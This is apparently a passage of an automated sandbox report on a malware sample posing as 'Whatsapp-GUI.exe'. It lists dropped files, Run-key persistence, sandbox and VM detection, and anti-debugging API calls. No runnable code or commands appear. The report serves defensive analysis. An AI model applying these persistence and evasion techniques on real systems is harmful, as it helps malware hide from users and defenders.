Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Whatsapp-GUI.exe

Static PE information: certificate valid

PE file contains a COM descriptor data directory

Source: Whatsapp-GUI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Whatsapp-GUI.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: Whatsapp-GUI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:

Binary string: C:\Users\Work\source\repos\Whatsapp-GUI\Whatsapp-GUI\obj\Debug\Whatsapp-GUI.pdb source: Whatsapp-GUI.exe

Data Obfuscation

Source: Whatsapp-GUI.exe

Static PE information: 0x8CE2628A [Fri Nov 25 00:30:02 2044 UTC]

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CBC6D9 LoadLibraryA,GetProcAddress,

8_2_00CBC6D9

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0190EED2 push eax; iretd	0_2_0190EED9
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_091EFCFE pushad ; retf	0_2_091EFD01
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0A52030A push 8405B2CFh; iretd	0_2_0A520311
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0A522809 push A005B2E4h; ret	0_2_0A522815
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Code function: 0_2_0AE139BD push FFFFFF8Bh; iretd	0_2_0AE139BF
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463B625 push ecx; ret	3_3_0463B638
Source: C:\ProgramData\Updater\UpdaterService.exe	Code function: 3_3_0463B625 push ecx; ret	3_3_0463B638
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C68B75 push ecx; ret	8_2_00C68B88
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C9D9 push 0179CA05h; ret	8_2_0179C9FD
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C998 push 0179CA05h; ret	8_2_0179C9FD
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179A3F5 push eax; ret	8_2_0179A431
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C391 push 0179C3E2h; ret	8_2_0179C3DA
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_017A0579 push 017A059Fh; ret	8_2_017A0597
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C5D9 push 0179C605h; ret	8_2_0179C5FD
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179FC8D push 0179FE09h; ret	8_2_0179FE01
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C721 push 0179C74Dh; ret	8_2_0179C745
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179CF25 push ecx; iretd	8_2_0179CF26
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179CF03 push ecx; iretd	8_2_0179CF06
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_017A1799 push ecx; iretd	8_2_017A179A
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179C611 push 0179C63Dh; ret	8_2_0179C635
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179FE0B push 0179FE7Ch; ret	8_2_0179FE74
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179FE0D push 0179FE7Ch; ret	8_2_0179FE74
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179D691 push ecx; mov dword ptr [esp], eax	8_2_0179D692
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04700454 push 04700480h; ret	8_2_04700478
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04748448 push 04748474h; ret	8_2_0474846C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0470C436 push 0470C464h; ret	8_2_0470C45C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0470C438 push 0470C464h; ret	8_2_0470C45C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04748410 push 0474843Ch; ret	8_2_04748434
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047484F0 push 0474851Ch; ret	8_2_04748514
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F64E4 push 046F6535h; ret	8_2_046F652D
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047204E0 push 0472055Eh; ret	8_2_04720556

Persistence and Installation Behavior

Source: C:\ProgramData\Updater\UpdaterService.exe	File created: C:\ProgramData\addbage\Autoit3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	File created: C:\ProgramData\Updater\UpdaterService.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	File created: C:\ProgramData\Updater\Autoit3.exe	Jump to dropped file

Source: C:\ProgramData\Updater\UpdaterService.exe	File created: C:\ProgramData\addbage\Autoit3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	File created: C:\ProgramData\Updater\UpdaterService.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	File created: C:\ProgramData\Updater\Autoit3.exe	Jump to dropped file

Boot Survival

Source: C:\ProgramData\Updater\UpdaterService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cefccga			Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cefccga			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CC59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		8_2_00CC59B3
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00C55EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		8_2_00C55EDA

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C633B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00C633B7

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\addbage\Autoit3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_0474C828

8_2_0474C828

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SUPERANTISPYWARE.EXE

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Memory allocated: 1900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior

Source: C:\ProgramData\Updater\UpdaterService.exe

Code function: 3_3_045F2CB9 rdtsc

3_3_045F2CB9

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Thread delayed: delay time: 1800000	Jump to behavior

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Window / User API: threadDelayed 459	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Window / User API: threadDelayed 545	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Window / User API: threadDelayed 2336	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Window / User API: foregroundWindowGot 1345	Jump to behavior

Source: C:\ProgramData\addbage\Autoit3.exe

API coverage: 5.0 %

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_0474C828

8_2_0474C828

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe TID: 6192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe TID: 6192	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe TID: 5428	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe TID: 2460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe TID: 2924	Thread sleep time: -1800000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Domain FROM Win32_ComputerSystem

Source: C:\ProgramData\addbage\Autoit3.exe	Last function: Thread delayed
Source: C:\ProgramData\addbage\Autoit3.exe	Last function: Thread delayed

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00CA4005
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00CAC2FF
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA494A GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00CA494A
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_00CACD9F
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CACD14 FindFirstFileW,FindClose,	8_2_00CACD14
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00CAF5D8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00CAF735
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00CAFA36
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_00CA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00CA3CE2
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0179BD35 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	8_2_0179BD35
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0474A584 FindFirstFileW,lstrcmpW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose,	8_2_0474A584
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F89F4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	8_2_046F89F4
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F8AFC FindFirstFileA,GetLastError,	8_2_046F8AFC
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047431F8 FindFirstFileW,FindNextFileW,FindClose,	8_2_047431F8
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_04723D68 FindFirstFileW,FindNextFileW,FindClose,	8_2_04723D68
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0470BD8C FindFirstFileA,FindNextFileA,FindClose,	8_2_0470BD8C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_046F5974 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	8_2_046F5974
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0474BA70 FindFirstFileW,FindNextFileW,FindClose,	8_2_0474BA70

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C55D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00C55D13

Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Whatsapp-GUI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\Updater\UpdaterService.exe	Thread delayed: delay time: 1800000	Jump to behavior

Source: Autoit3.exe, 00000009.00000002.2472312343.00000000017CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: Autoit3.exe, 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: UpdaterService.exe, UpdaterService.exe, 00000003.00000002.3941184211.0000000003EC1000.00000040.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3940858660.0000000003D04000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3942078609.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2230084824.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000003.2229666287.0000000004DA8000.00000004.00001000.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3941115350.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, Autoit3.exe, 00000008.00000002.2391311533.0000000004534000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391730734.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: Whatsapp-GUI.exe, 00000000.00000002.3099652523.000000000167F000.00000004.00000020.00020000.00000000.sdmp, UpdaterService.exe, 00000003.00000002.3939848242.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.2390439932.00000000017A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\ProgramData\addbage\Autoit3.exe	API call chain: ExitProcess graph end node			graph_8-139237
Source: C:\ProgramData\addbage\Autoit3.exe	API call chain: ExitProcess graph end node			graph_8-139307

Source: C:\ProgramData\Updater\UpdaterService.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\ProgramData\Updater\UpdaterService.exe

Code function: 3_3_045F2CB9 rdtsc

3_3_045F2CB9

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CB45D5 BlockInput,

8_2_00CB45D5

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C55240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

8_2_00C55240

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00C75CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

8_2_00C75CAC

Source: C:\ProgramData\addbage\Autoit3.exe

Code function: 8_2_00CBC6D9 LoadLibraryA,GetProcAddress,

8_2_00CBC6D9

Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_017A8936 mov eax, dword ptr fs:[00000030h]	8_2_017A8936
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0471A79C mov eax, dword ptr fs:[00000030h]	8_2_0471A79C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_0471A79C mov eax, dword ptr fs:[00000030h]	8_2_0471A79C
Source: C:\ProgramData\addbage\Autoit3.exe	Code function: 8_2_047180A4 mov eax, dword ptr fs:[00000030h]	8_2_047180A4

Source: C:\ProgramData\addbage\Autoit3.exe

